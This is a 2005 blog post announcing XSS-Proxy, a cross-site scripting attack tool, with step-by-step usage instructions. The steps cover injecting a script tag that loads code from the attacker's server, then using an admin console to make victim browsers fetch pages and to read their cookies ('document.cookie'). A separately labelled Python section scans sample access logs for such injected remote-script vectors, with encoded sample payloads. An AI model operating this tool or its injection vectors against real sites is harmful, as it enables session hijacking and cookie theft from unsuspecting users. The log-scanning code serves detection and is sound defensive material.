
Announcing XSS-Proxy

I have uploaded my demo code from Shmoocon 2005. I'll be putting a more descriptive page, instructions, a whitepaper and the Shmoocon slides up over the next few days.

Here's an overview of using the tool:
1 - Modify the Perl script variables $code_server and $PORT to point to the system you will be running the Perl script on (the defaults are port 80 and http://localhost).
2 - Run the Perl script and point the attack browser at /admin on the server running the Perl script (with the defaults this would be http://localhost/admin). This is the attacker admin console.
3 - The initialization URL a victim needs to load is /xss2.js. Your initial XSS vector needs to point back to the Perl server and this filename (i.e. to XSS your own browser with a local code server, enter <script src="http://localhost/xss2.js"></script>).
4 - Once a victim is initialized and in a wait loop, you can either browse the / document of the XSS'd site and click on links you want the victim to visit and forward back, or enter documents/variables in the associated form inputs.
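As an added defensive example (not part of the original post or the XSS-Proxy code), the following Python scans constructed web-server access-log lines for the initialization vector from step 3: a reflected <script src=...> whose source is a host other than the site's own. It reports the requesting IP together with the remote code-server host so that host can be blocked; the log format, hostnames and addresses are assumed.

```python
import re
from urllib.parse import unquote, urlparse

# <script ... src=...> with the src value captured (quotes optional)
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)
# Common Log Format access-log entry (assumed format)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def remote_script_sources(path, own_hosts):
    """Return external hosts referenced by <script src=...> inside a request path.

    The path is URL-decoded twice so a double-encoded vector (%253C...) is
    still seen. Relative sources and the site's own hosts are ignored.
    """
    decoded = unquote(unquote(path))
    hosts = []
    for src in SCRIPT_SRC.findall(decoded):
        host = urlparse(src).hostname
        if host and host.lower() not in own_hosts:
            hosts.append(host.lower())
    return hosts

def scan_log(lines, own_hosts):
    """Return (client_ip, code_server_host) for each request carrying a remote script vector."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that do not parse as access-log entries
        for host in remote_script_sources(m["path"], own_hosts):
            findings.append((m["ip"], host))
    return findings

# Constructed sample log lines; 198.51.100.7 plays the attacker's code server
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Feb/2005:10:01:02 -0500] "GET /search?q=%3Cscript%20src%3D%22http%3A%2F%2F198.51.100.7%2Fxss2.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Feb/2005:10:01:05 -0500] "GET /search?q=shoes HTTP/1.1" 200 1024',
    '203.0.113.5 - - [08/Feb/2005:10:01:09 -0500] "GET /page?x=%253Cscript%2520src%253Dhttp%253A%252F%252F198.51.100.7%252Fxss2.js%253E HTTP/1.1" 200 300',
    '203.0.113.2 - - [08/Feb/2005:10:02:00 -0500] "GET /page?x=%3Cscript%20src%3D%22http%3A%2F%2Fwww.example.com%2Fapp.js%22%3E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, host in scan_log(SAMPLE_LOG, {"www.example.com"}):
        print(f"{ip} injected a remote script from {host}")
```

The fourth sample line references the site's own host and is deliberately not flagged, while the third shows that double-encoding does not evade the check.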

Admin commands and operation:
- The console does not refresh/update on its own; you need to press the refresh/reload button in your browser.
- JavaScript is not required to run the console, and it may be safer to disable it for the attacker console. I've XSS'd myself a few times with some advanced testing.
- Sessions will show up in the Sessions section once they get XSS'd.
- Each session should forward a copy of the "/" directory off the XSS'd server.
- Forwarded documents are listed in the "Document Results" section. If you click on a document, its URLs are rewritten, and clicking a link within that document makes the proxy request that the same client load the link.
- If it's a form, you need to make sure the last page that client loaded is the same page, then fill out the values and submit the form. Some URL rewriting happens here as well.
- You can also do document loads manually by entering the URL in the "Fetch Document" form. The first value (left) is the session number, and the second is the document to retrieve (e.g. 0 and http://xssed.com/stuff).
- The other form, "Evaluate", is for querying JavaScript variables/functions from specific clients. Enter the session on the left and the variable on the right (e.g. 0 and document.cookie to display the cookies for session 0).
- Results of evaluate requests will appear in the "Eval Results" section.
- Errors from page loads and evaluate requests will appear in the "Errors" section.

There are still a few bugs in the code, so read the initial comments in the controller script to see what it may have issues with. The attack works with IE and Firefox browsers (other browsers may work with some additional tweaks), and the Perl script runs on almost any OS with a basic Perl install. I've tested it on Linux and Windows (ActiveState Perl).

Have fun.

Anton Rager

Posted by Anton Rager 2005-02-08
